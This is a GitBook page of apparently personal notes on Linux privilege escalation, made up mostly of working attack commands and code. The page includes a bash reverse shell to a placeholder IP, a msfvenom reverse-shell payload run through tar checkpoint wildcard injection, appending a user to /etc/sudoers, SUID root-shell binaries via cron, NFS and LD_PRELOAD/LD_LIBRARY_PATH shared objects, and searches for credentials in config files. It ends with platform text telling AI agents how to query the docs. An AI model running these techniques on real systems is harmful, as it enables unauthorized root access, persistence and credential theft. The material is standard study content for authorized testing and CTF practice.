> For the complete documentation index, see [llms.txt](https://strange-1.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://strange-1.gitbook.io/notes/privilege-escalation/linux-privesc.md).

# Linux PrivEsc

## Kernel Exploits

```bash
# checking the Kernel level and Linux OS version.
uname -a
cat /etc/lsb-release
```

## Cron Jobs

```bash
# Find world writables files or directories, look for uncommon files which can be leveraged to escalate privelges
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null

# Find cron jobs
cat /etc/crontab

# Confirm the job is running using pspy - <https://github.com/DominicBreuker/pspy>
# The -pf flag tells the tool to print commands and file system events and -i 1000 tells it to scan profcs every 1000ms (or every second).
./pspy64 -pf -i 1000

# If a script is running by a root by a cron job and also writable by us then we can add ou reverse shell one liner to the script
bash -i >& /dev/tcp/ip/443 0>&1
```

* If a cron job program/script does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program/script with the same name as the cron job.

  ```bash
  # Create a file with esame name as cron job in a directory writable by user which is also included in PATH
  ---
  #!/bin/bash
  cp /bin/bash /tmp/rootbash
  chmod +s /tmp/rootbash
  ---

  # make it executable and wait for cron jobto run and then try to execute the script
  /tmp/rootbash –p
  ```

## Special Permissions

**Setuid Bit -**

* The `Set User ID upon Execution`(`setuid`) permission can allow a user to execute a program or script with the permissions of another user, typically with elevated privileges. The `setuid`bit appears as an `s`.

**Setgid Bit -**

* The Set-Group-ID (setgid) permission is another special permission that allows us to run binaries as if we were part of the group that created them.

```bash
# find files with setuid bit set 
find / -user root -perm -4000 -exec ls -ldb {} \\; 2>/dev/null

# find files with setgid bit set
find / -user root -perm -6000 -exec ls -ldb {} \\; 2>/dev/null

# We can use GTFOBins to bypass security restrictions.
```

## **Sudo Rights Abuse**

```bash
# Checking sudo rights of user
sudo -l

# Check GTFObins for any useful abuse
```

## PATH abuse

```bash
# Checking PATH content
echo $PATH
env | grep PATH

# Adding to PATH variable
PATH=.:${PATH}
export PATH
echo $PATH

# If we want to run a file in our current directory without specifying path.
touch ls
echo 'echo "PATH ABUSE!!"' > ls
chmod +x ls
```

## **Wildcard Abuse**

| Character                                                               | Significance                                                                      |
| ----------------------------------------------------------------------- | --------------------------------------------------------------------------------- |
| \*                                                                      | An asterisk that can match any number of characters in a file name.               |
| ?                                                                       | Matches a single character.                                                       |
| \[ ]                                                                    | Brackets enclose characters and can match any single one at the defined position. |
| \~                                                                      | A tilde at the beginning expands to the name of the user home                     |
| directory or can have another username appended to refer to that user's |                                                                                   |
| home directory.                                                         |                                                                                   |
| -                                                                       | A hyphen within brackets will denote a range of characters.                       |

```bash
# To add user to sudoers file
echo "eren ALL=(root) NOPASSWD: ALL" >> /etc/sudoers 

# Check if a command is run by any cron job or any script with wildacrd 
# create a reverse shell using msfvenom 
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=53 -f elf -o shell.elf

# Paste the reverse shell where the command is running from
# Create two files in the directory:
touch directory --checkpoint=1
touch directory --checkpoint-action=exec=shell.elf

# wait for job to run and get a root shell
```

## Credential Hunting

```bash
# Finding Files which may contain credentials
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null

cat wp-config.php | grep 'DB_USER\\|DB_PASSWORD'

# Also look for SSH Keys
```

## Environment Variable

### LD\_PRELOAD

```bash
# List the programs your user is allowed to run via *sudo*
# Note if the env_keep option includes the LD_PRELOAD environment variable.

# Create c program to get a root shell
---
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
	unsetenv("LD_PRELOAD");
	setresuid(0,0,0);
	system("/bin/bash -p");
}
---

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c

# Run any allowed program using sudo, while setting the LD_PRELOAD environment variable to the full path of the preload.so file:
```

### LD\_LIBERARY\_PATH

```bash
# print the shared object required by a binary or shared object
ldd binary

# Checking RUNPATH configuration
readelf -d binary  | grep PATH

# Compile a shared object with below code to pop a root shell
---
#include<stdio.h>
#include<stdlib.h>

void dbquery() {
    printf("Malicious library loaded\\n");
    setuid(0);
    system("/bin/sh -p");
}
---
gcc src.c -fPIC -shared -o /development/libshared.so <--path where binary is located
```

## **Weak NFS Privileges**

```bash
# List the mountable shares
showmount -e ip

# create a SETUID binary that executes /bin/sh using our local root user. We can then mount the /tmp directory locally, copy the root-owned binary over to the NFS server, and set the SUID bit. 

shell.c
---
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
  setuid(0); setgid(0); system("/bin/bash");
}
---

# compile the binary
gcc shell.c -o shell

# Mount the share
sudo mount -t nfs ip:/tmp /mnt
cp shell /mnt
chmod u+s /mnt/shell

# Run the binary in low prvileged user shell
./shell
```

## Weak file Permission

```bash
# Find Writable Directories
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null

# Find Writable Files
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://strange-1.gitbook.io/notes/privilege-escalation/linux-privesc.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.